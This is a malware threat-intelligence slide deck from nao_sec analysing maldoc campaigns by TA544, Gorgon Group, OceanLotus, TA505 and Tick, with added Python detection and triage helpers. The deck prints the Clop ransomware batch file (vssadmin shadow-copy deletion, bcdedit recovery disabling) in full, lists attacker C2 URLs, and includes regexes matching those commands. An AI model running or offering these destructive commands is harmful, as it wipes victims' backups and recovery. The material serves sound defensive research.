Copyright©2019 nao_sec All Rights Reserved.
Who are we
• Shota Nakajima
  • Malware Analyst
  • Engaged in incident response
  • Works at Cyber Defense Institute, Inc. in Japan
• Rintaro Koike
  • Chief researcher / founder of nao_sec
  • Threat Hunter
  • Malicious traffic / script / document analyst
    • Especially Drive-by Download attacks
Public Services for Hunting
• VirusTotal
  • Private API
  • Yara (Live & Retro Hunt)
• Hybrid Analysis
  • Yara (Retro Hunt)
  • ATT&CK Tactic & Technique
• ANY.RUN
  • ATT&CK Technique
  • Suricata SID
VirusTotal Private API
• Our queries
  • maldoc (0 < positive) submitter JP
  • suspicious (0 < positive) zip submitter JP
  • suspicious (0 < positive) lnk submitter JP
  • suspicious (0 < positive) rtf submitter JP
  • email submitter JP
VirusTotal Private API
• Engines
  • Useful if you want to hunt a specific family
VirusTotal Livehunt
• The following rules have been set
  • CVE_2018_0798
  • CVE_2017_11882
  • CVE_2018_0802
  • CVE_2018_20250
Hybrid Analysis
ANY.RUN
T1170 - Mshta
Gorgon Group
T1085 – Rundll32
OceanLotus
T1137 - Office Application Startup
Tick
TA544
• Attack by the TA544 (Cutwail-A / invoice) Group
  • Maldoc disguised as a purchase order, bill, etc.
  • The purpose is to infect the victim with Ursnif and steal user information
  • The attack campaign has been observed since around June 2016
  • Started to use steganography after October 24, 2018
  • Started to check the execution environment after December 18, 2018
  • The same attack has been observed in Italy
    • https://blog.yoroi.company/research/ursnif-long-live-the-steganography/
• Attack by the TA544 (Cutwail-A / invoice) Group
  1. Send E-mail with attached (Excel) file from the Cutwail Botnet
  2. Macro runs when opening the Excel file
  3. Processing transitions from the macro to PowerShell
  4. PowerShell runs Bebloh (URLZone)
  5. Bebloh downloads and runs Ursnif
2018-12-18
Excel Macro
xlCountrySetting
Invoke-PSImage
Get-Culture
Invoke-ReflectivePEInjection
The DLL version of Bebloh runs fileless
[2019-02-11]
CultureInfo.CurrentCulture
[2019-02-18]
Format Currency
[2019-02-26]
IP address geolocation
[2019-02-28]
GetUserDefaultLCID and GetLocaleInfo
[2019-03-06]
Symbol programming
[2019-03-06]
Steganography by .NET Assembly
Interesting features
• Steganography (Invoke-PSImage)
  • In the process, additional code or Bebloh is generated from the data embedded in the image file
  • Attack campaigns that use steganography continuously are rare...?
• Environmental detection
  • Checks multiple times whether the execution environment matches the intended target
  • OS language, currency setting, IP address geolocation
• Analysis interference
  • Bebloh runs fileless
    • Invoke-ReflectivePEInjection
  • Multiple obfuscation layers, dynamic execution, processing in multiple languages
    • Obfuscation like jjencode
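The environment checks and loaders listed above make good static hunting indicators once the obfuscation layers have been stripped. The Python scanner below is an added example written for this summary; it is not code from nao_sec or from the malware. It groups the indicator strings named on these slides by the role they play in the chain and flags a script stage only when a locale check is paired with steganography or in-memory loading, since a lone Get-Culture is ordinary in admin scripts. The regex shapes around the names, the currency-format patterns and the sample stage are my assumptions and constructions.

```python
import re
from typing import Dict, List

# Indicator names come from the nao_sec slides (xlCountrySetting, Get-Culture,
# CultureInfo.CurrentCulture, Format Currency, GetUserDefaultLCID, GetLocaleInfo,
# Invoke-PSImage, Invoke-ReflectivePEInjection). The regex shapes around them
# are my assumptions about how they appear in decoded PowerShell or VBA text.
INDICATORS: Dict[str, List[str]] = {
    "environment_check": [
        r"\bxlCountrySetting\b",
        r"\bGet-Culture\b",
        r"CultureInfo\]?(::|\.)CurrentCulture",
        r"\{0:C\}|ToString\(\s*['\"]C['\"]\s*\)",  # a number formatted as currency
        r"\bGetUserDefaultLCID\b",
        r"\bGetLocaleInfo[AW]?\b",
    ],
    "steganography": [r"\bInvoke-PSImage\b"],
    "fileless_execution": [r"\bInvoke-ReflectivePEInjection\b"],
}


def scan_script(text: str) -> Dict[str, List[str]]:
    """Return, per category, the distinct indicator strings found in text."""
    hits: Dict[str, List[str]] = {}
    for category, patterns in INDICATORS.items():
        found: List[str] = []
        for pat in patterns:
            for m in re.finditer(pat, text, re.IGNORECASE):
                if m.group(0) not in found:
                    found.append(m.group(0))
        if found:
            hits[category] = found
    return hits


def is_targeted_chain(hits: Dict[str, List[str]]) -> bool:
    """Flag only when a locale check is paired with stego or in-memory loading,
    the combination the TA544 chain shows; a lone culture lookup is normal in
    admin scripts and would otherwise drown the hunt in noise."""
    env = "environment_check" in hits
    payload = "steganography" in hits or "fileless_execution" in hits
    return env and payload


# Constructed sample of a decoded PowerShell stage (not a real malware sample).
SAMPLE_STAGE = r'''
$c = (Get-Culture).Name
if ($c -ne 'ja-JP') { exit }
$cur = (1234.5).ToString("C")
$code = Invoke-PSImage -Image $img
Invoke-ReflectivePEInjection -PEBytes $pe
'''

if __name__ == "__main__":
    h = scan_script(SAMPLE_STAGE)
    for cat, names in h.items():
        print(f"{cat}: {', '.join(names)}")
    print("targeted chain:", is_targeted_chain(h))
```

Feed it deobfuscated stages or the script text recorded by PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, event 4104); the slides note that the chain uses several obfuscation layers and dynamic execution, so the first-stage macro will rarely contain these strings in the clear.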
Summary
• The techniques used by TA544 are evolving
  • Steganography (PowerShell & .NET)
  • Environmental detection
    • xlCountrySetting
    • Get-Culture
    • CultureInfo.CurrentCulture
    • Format Currency
    • GetUserDefaultLCID + GetLocaleInfo
  • Fileless execution
    • Invoke-ReflectivePEInjection
→ Monitor and limit the execution of macros and PowerShell properly
→ Collect and deploy threat information early
Gorgon Group
• Gorgon Group has targeted the UK, Spanish, Russian and US governments
• Related to Pakistani actors
• Uses public services
  • Bitly
  • Pastebin
  • Blogger
Macro
Access to Bitly link
27.html
• Reads blog-pages.html; this seems to be an update process
• The code at the bottom of 27.html that retrieves data from Pastebin, decodes it and executes it is written in VBScript
• What is pasted on Pastebin is Base64-encoded malware
Pastebin
• Pastebin was used from a logged-in account
  • User name: HAGGA
RevengeRAT
• Decoding the data placed on Pastebin yielded a .NET assembly
• Decompiling it shows that it appears to be RevengeRAT
Summary
• It has been observed all over the world
• T1170 - MSHTA
• Public services
  • Bitly
  • Blogger
  • Pastebin
OceanLotus
• Other names
  • APT32, APT-C-00, SeaLotus
• This group is believed to be related to Vietnam
• It has been active since at least 2014
• This March, an attack on Southeast Asian bases of automobile companies (including a Japanese one) was reported
  • https://www.bloomberg.com/news/articles/2019-03-20/vietnam-tied-hackers-target-auto-industry-firms-fireeye-says
Pattern 1
Flow diagram (labels recovered from the slide): VBA → decoder → decode metaimg1.wmf → Shellcode → load memory → backdoor → C2 module
https://app.any.run/tasks/330f9f1e-c8a4-4dea-b74f-c6c6eb90b899/
Macro
XOR with 0xCA => 4D 5A (MZ)
Decoder DLL
• This DLL only performs a 1-byte XOR decode of the WMF
• The WMF is shellcode
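Two decoding steps on this deck reduce to the same analyst routine: the OceanLotus macro's XOR with 0xCA reveals the 4D 5A (MZ) header of the decoder DLL, and the Gorgon Group data on Pastebin decodes from Base64 into a .NET assembly, which is also a PE image. The Python triage helper below is an added example, not nao_sec's tooling or the malware's code: it recognises a PE by its MZ header and PE signature, carves Base64 runs out of pasted text, and recovers an unknown single-byte XOR key by testing all 256 candidates against that header check. The WMF-to-shellcode stage above is not a PE, so this check does not apply to it. The sample PE header is constructed filler, not an executable, and the thresholds (200-character Base64 runs, 0x200-byte key-test window) are my choices.

```python
import base64
import re
from typing import List, Optional, Tuple

PE_SIGNATURE = b"PE\0\0"
DOS_STUB = b"This program cannot be run in DOS mode"


def looks_like_pe(data: bytes) -> bool:
    """MZ at offset 0 and the PE signature at e_lfanew (the DWORD at 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return 0 < e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR (the macro's 0xCA step is one instance of this)."""
    return bytes(b ^ key for b in data)


def recover_xor_key(data: bytes, window: int = 0x200) -> Optional[int]:
    """Brute-force a single-byte XOR key: only the header window is decoded per
    candidate, and a candidate is accepted when it yields a valid PE header."""
    head = data[:window]
    for key in range(256):
        if looks_like_pe(xor_decode(head, key)):
            return key
    return None


# Runs of Base64 alphabet long enough to hold a PE header (assumed threshold).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def carve_base64_pe(text: bytes) -> List[bytes]:
    """Decode every long Base64 run in pasted text and keep the PE images."""
    found: List[bytes] = []
    for m in B64_RUN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if looks_like_pe(decoded):
            found.append(decoded)
    return found


def triage(blob: bytes) -> Tuple[str, Optional[int]]:
    """Classify a blob: plain PE, Base64-wrapped PE, single-byte-XOR PE, or unknown."""
    if looks_like_pe(blob):
        return ("plain-pe", None)
    if carve_base64_pe(blob):
        return ("base64-pe", None)
    key = recover_xor_key(blob)
    if key is not None:
        return ("xor-pe", key)
    return ("unknown", None)


def build_fake_pe() -> bytes:
    """Constructed header-only stand-in for a PE file (filler, not executable)."""
    img = bytearray(b"MZ" + b"\x90" * 0x3A)            # 0x3C bytes of DOS header
    img += (0x80).to_bytes(4, "little")                # e_lfanew -> 0x80
    img += DOS_STUB.ljust(0x40, b"\0")                 # stub filler up to 0x80
    img += PE_SIGNATURE + b"\x4c\x01" + b"\0" * 0x100  # signature, Machine, filler
    return bytes(img)


def constructed_paste(pe: bytes) -> bytes:
    """Constructed stand-in for a paste that embeds a Base64-encoded PE."""
    return b"notes\n" + base64.b64encode(pe) + b"\nend\n"


if __name__ == "__main__":
    pe = build_fake_pe()
    print(triage(xor_decode(pe, 0xCA)))   # ('xor-pe', 202)
    print(triage(constructed_paste(pe)))  # ('base64-pe', None)
```

The key search is unambiguous because only one key maps the first two bytes back to "MZ"; the PE-signature check then guards against a stray "MZ" in random data. For multi-byte or rolling keys the same known-plaintext idea applies, but the candidate space has to be searched per key position.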
Shellcode (Backdoor Launcher)
• DOS header in the shellcode
  • The other parts (headers and code) are encrypted
  • OceanLotus often uses this pattern
• The head is a call instruction
Backdoor DLLs
• The backdoor DLL has encoded data in its resources
• Connects to C2s
  • http[:]//ps.andreagahuvrauvin.com
  • http[:]//paste.christienollmache.xyz
  • http[:]//att.illagedrivestralia.xyz
• Creates key
  • SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}
• Exports
  • CreateInstance function
Relevance
• This DLL is related to the Cylance report
  • OceanLotus Steganography Malware Analysis White Paper
  • Same registry key and CLSID
  • Same export function
  • https://www.cylance.com/en-us/lp/threat-research-and-intelligence/oceanlotus-steganography-malware-analysis-white-paper-2019.html
Pattern 2
Flow diagram (labels recovered from the slide): VBA → Shellcode → backdoor
https://app.any.run/tasks/16a7605e-6e75-4b35-82d8-aa30cefd342d/
Macro
Relevance
• Some points match the code of Cobalt Strike
Shellcode
• DOS header in the shellcode
  • The other parts (headers and code) are encrypted
• Same as Pattern 1
Backdoor DLLs
• Same backdoor as Pattern 1
  • strings
  • BinDiff result (pattern2 vs. pattern1)
Summary
• Using Cobalt Strike
• Unique shellcode
• Encoded multiple times
  • T1140
• Keeps data in the resource area
TA505
• This group was named TA505 by Proofpoint
• TA505 has been in the cybercrime business since around 2015
  • Not APT
• Early days
  • Sending malspam emails that infected victims with banking Trojans and ransomware
• Recently
  • Spreading document files that infect victims with RATs and bots, mainly in Korea
  • An attack on Japan was also observed
TA505 case by KRCERT
• KRCERT has published an attack flow of TA505
  • However, we have only spotted a part of the attack
  • https://www.krcert.or.kr/filedownload.do?attach_file_seq=2169&attach_file_id=EpF2169.pdf
The Japanese case
• Malspam by TA505 targeted Japan in February
  • It pushed FlawedAmmyy
• The subject and the text are interesting
  • It copied malspam sent by other actors the day before
  • https://twitter.com/nao_sec/status/1098069300340903936
Excel document file
Word document file
$ python oledump.py request.doc
  1:       146 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      6858 '1Table'
  5:       421 'Macros/PROJECT'
  6:        71 'Macros/PROJECTwm'
  7: M   95423 'Macros/VBA/NewMacros'
  8: m    1020 'Macros/VBA/ThisDocument'
  9:     28021 'Macros/VBA/_VBA_PROJECT'
Malware
• FlawedAmmyy
  • RAT created based on the leaked Ammyy source code
• Clop
  • Ransomware
• Amadey
  • Multifunctional bot
There are also others…
FlawedAmmyy
• Signed
• Install by msiexec.exe
• Download …
• Use custom packer
Clop
• Signed
Clop
• Same custom packer as FlawedAmmyy
Clop
• Runs only as a service
  • In other words, service installation is expected to be done by some other method
  • This is mentioned in the KRCERT report
Clop
• Decodes resource data
  • bat file
  • ransom note
@echo off
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
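The batch file above is a good detection opportunity: the same vssadmin/bcdedit command lines show up in process-creation telemetry. The following is an added example (not code from the slides or from the Clop sample) that runs those patterns over constructed Sysmon-style log records; the record layout and field names are assumptions for this example.

```python
"""Flag the shadow-copy and recovery tampering seen in the Clop batch file.

Added example, not code from the original slides. The log lines are constructed
Sysmon-style process-creation (EventID 1) records; their layout is an assumption.
"""
import re

# Command-line patterns taken from the batch file above, as (name, regex) pairs.
# Matching is case-insensitive because cmd.exe is.
RULES = [
    ("vssadmin_delete_shadows", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("vssadmin_resize_storage", re.compile(r"vssadmin(\.exe)?\s+resize\s+shadowstorage", re.I)),
    ("bcdedit_recovery_off", re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b", re.I)),
    ("bcdedit_ignore_failures", re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
]

# Constructed record layout: "<timestamp> EventID=1 Image=<path> CommandLine=<cmd>"
LOG_LINE = re.compile(r"^(?P<ts>\S+) EventID=1 Image=(?P<image>\S+) CommandLine=(?P<cmd>.*)$")


def match_line(line):
    """Parse one record and return (timestamp, image, [rule names]), or None."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    cmd = m.group("cmd")
    return (m.group("ts"), m.group("image"), [n for n, rx in RULES if rx.search(cmd)])


def scan(lines):
    """Return every (timestamp, image, rule) hit across the log."""
    hits = []
    for ts, image, names in filter(None, map(match_line, lines)):
        hits.extend((ts, image, n) for n in names)
    return hits


def is_ransomware_prep(hits):
    """Alert on the combination the batch file produces: shadows deleted AND recovery disabled."""
    rules = {r for _, _, r in hits}
    return "vssadmin_delete_shadows" in rules and "bcdedit_recovery_off" in rules


SAMPLE_LOG = [  # constructed sample records, not real telemetry
    "2019-02-05T09:12:01Z EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe /c dir",
    "2019-02-05T09:12:03Z EventID=1 Image=C:\\Windows\\System32\\vssadmin.exe CommandLine=vssadmin Delete Shadows /all /quiet",
    "2019-02-05T09:12:03Z EventID=1 Image=C:\\Windows\\System32\\vssadmin.exe CommandLine=vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB",
    "2019-02-05T09:12:04Z EventID=1 Image=C:\\Windows\\System32\\bcdedit.exe CommandLine=bcdedit /set {default} recoveryenabled No",
    "2019-02-05T09:12:04Z EventID=1 Image=C:\\Windows\\System32\\bcdedit.exe CommandLine=bcdedit /set {default} bootstatuspolicy ignoreallfailures",
]
```

Requiring both the shadow deletion and the bcdedit change before alerting keeps single legitimate vssadmin invocations by backup software from paging anyone.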
Amadey
• Amadey is installed by msiexec.exe when you open a malicious Excel file
https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784/
Amadey
• Same custom packer as FlawedAmmyy and Clop
Amadey
• Luckily, it has symbol information
• Multifunctional bot
  • Download and execute next payload
  • Gathering environmental information
  • Bypass UAC
  • Check Avs
  • etc…
Amadey
• Some interesting encoded strings
  • C2 domain
  • C2 parameter
  • drop name and directory name
  • Check Avs name
  • AutoRun command
Summary
• Excel 4.0
• Defense Evasion
  • Install malware using msiexec.exe (T1218)
  • Signed malware (T1116)
  • Custom packer (T1140)
    • Used for packing multiple malware families
Tick
• Other name: BRONZE BUTLER
• Tick is a Chinese-origin group that has been active since 2008
• It targets Japan and Korea
[Pattern2] 2019-02
extract
Drop
%temp%\taskmar.exe
Word Open
%APPDATA%\Microsoft\Word\Startup\winhelp.wll
C2
Drop
https[:]//www.86coding.com//flow//index.php
https[:]//www.86coding.com//img//flow//img00.jpg
RTF
• Extension and icon mimic the doc format
• It has an OLE object
---+----------+---------------------------------------------------------------
id |index     |OLE Object
---+----------+---------------------------------------------------------------
0  |0005EBBDh |format_id: 2 (Embedded)
   |          |class name: 'Package'
   |          |data size: 1673928
   |          |OLE Package object:
   |          |Filename: u'8.t'
   |          |Source path: u'C:\\Aaa\\tmp\\8.t'
   |          |Temp path = u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\8.t'
   |          |MD5 = '026dbdbb1e525ce4b86734fa08be513d'
---+----------+---------------------------------------------------------------
RTF
• Dummy content mimics a real company
DLL
• winhelp.wll
  • Word Add-In
  • %APPDATA%\Microsoft\Word\Startup
  • Executed whenever the Word application is opened
• It has PDB information
  • C:\Users\Frank\Desktop\doc_dll\Release\DocDll.pdb
Downloader
• %temp%\taskmar.exe
  • File size is very large
    • about 78MB
    • self copy 1024 times
• It has PDB information
  • C:\Users\Frank\Desktop\ABK-old\Release\ABK.pdb
Downloader
• Similar code with the same logic as Pattern1
[Pattern3] 2019-01
C2
http[:]//www.ishuiyunjian.com/source/include/post/index.php
http[:]//www.ishuiyunjian.com/source/include/post/post.jpg
Has dummy PDF
Downloader
• It has a dummy PDF in the resource area
  • Named "EXE"
Downloader
• It has a config in the resource area
Downloader
• There is no big change, but some of the code differs
  • Maybe an update?
[Pattern4] 2019-05
%temp%\taskhast.exe
C2
http[:]//www.carilite.net//Coolbee//coolbee.bmp
http[:]//www.carilite.net//Coolbee//index.php
Dropper
• String table
  • Only "Folder"
• It has PDB information
  • C:\Users\Frank\Desktop\ABK\Release\Hidder.pdb
Downloader
• The "Check Avs" routine was changed
Downloader
• Hardcoded unique URLs ("//") and parameters
  • Several parameters were added
  • id=078BFBFF000406F1564309220&group=0&class=6
• It has PDB information
  • C:\Users\Frank\Documents\Visual Studio 2010\Projects\avenger\Release\avenger.pdb
Downloader
• Downloads a dummy bmp
  • It contains a Chinese notepad.exe named winlogon.exe
  • %appdata%\ \Microsoft\Internet Explorer
  • The implanted exe is encoded
Summary
• exe using RLO (T1036)
• Targeted, advanced decoy files
• Binary padding (T1009)
• exe implanted in an image file
  • They prefer Windows default wallpaper
• Use their own downloader and RAT
  • ABK Downloader
  • Datper
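Two of the Tick traits above are cheap to triage at scale: the recurring developer PDB paths (the same Windows user and project names across DocDll.pdb, ABK.pdb, Hidder.pdb and avenger.pdb) and the RLO file-name trick. The following is an added example (not code from the slides); it scans raw bytes for the CodeView "RSDS" record rather than parsing the PE debug directory, and the PE fragment is a constructed byte string.

```python
"""Triage helpers for the Tick artefacts above: PDB-path pivot and RLO check.

Added example, not code from the original slides. The PE fragment is a constructed
byte string; only the CodeView 'RSDS' record layout (signature, 16-byte GUID,
4-byte age, NUL-terminated path) is relied on.
"""
import re
import struct

RLO = "\u202e"  # Unicode RIGHT-TO-LEFT OVERRIDE, the T1036 trick named above
# Developer path fragments shared by the PDB strings on the previous slides.
PIVOT = re.compile(r"\\Users\\Frank\\.*\\(ABK|avenger|doc_dll)[^\\]*\\", re.I)


def extract_pdb_paths(data: bytes):
    """Return the PDB path of every RSDS CodeView record found in `data`."""
    paths, pos = [], 0
    while (pos := data.find(b"RSDS", pos)) >= 0:
        start = pos + 4 + 16 + 4            # skip signature, GUID and age
        end = data.find(b"\x00", start)
        if end > start:
            try:
                paths.append(data[start:end].decode("ascii"))
            except UnicodeDecodeError:      # not a real record, keep scanning
                pass
        pos += 4
    return paths


def pdb_pivot(path: str) -> bool:
    """True when a PDB path matches the campaign's developer path pattern."""
    return PIVOT.search(path.replace("/", "\\")) is not None


def rlo_display_name(name: str):
    """Return (disguised, name as Explorer renders it): 'photo' + U+202E + 'gpj.exe' shows as 'photoexe.jpg'."""
    if RLO not in name:
        return (False, name)
    head, tail = name.split(RLO, 1)
    return (True, head + tail[::-1])        # everything after the RLO renders reversed


# Constructed PE-like fragment carrying one RSDS record with a PDB path from the slides.
SAMPLE_PE = (b"MZ" + b"\x00" * 30 + b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1)
             + b"C:\\Users\\Frank\\Desktop\\ABK-old\\Release\\ABK.pdb\x00" + b"\x00" * 8)
```

A hit on `pdb_pivot` is a hunting lead, not a verdict; PDB strings are trivially editable, so confirm with the packer, resource and C2 traits described on the earlier slides.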
Summary
• Services and methods used for Hunting
  • VirusTotal
    • Private API
    • Yara (Live & Retro Hunt)
  • Hybrid Analysis
    • Yara (Retro Hunt)
    • ATT&CK Tactic & Technique
  • ANY.RUN
    • ATT&CK Technique
    • Suricata SID
• Actors' TTPs found from public sources
  • TA544
  • Gorgon Group
  • OceanLotus
  • TA505
  • Tick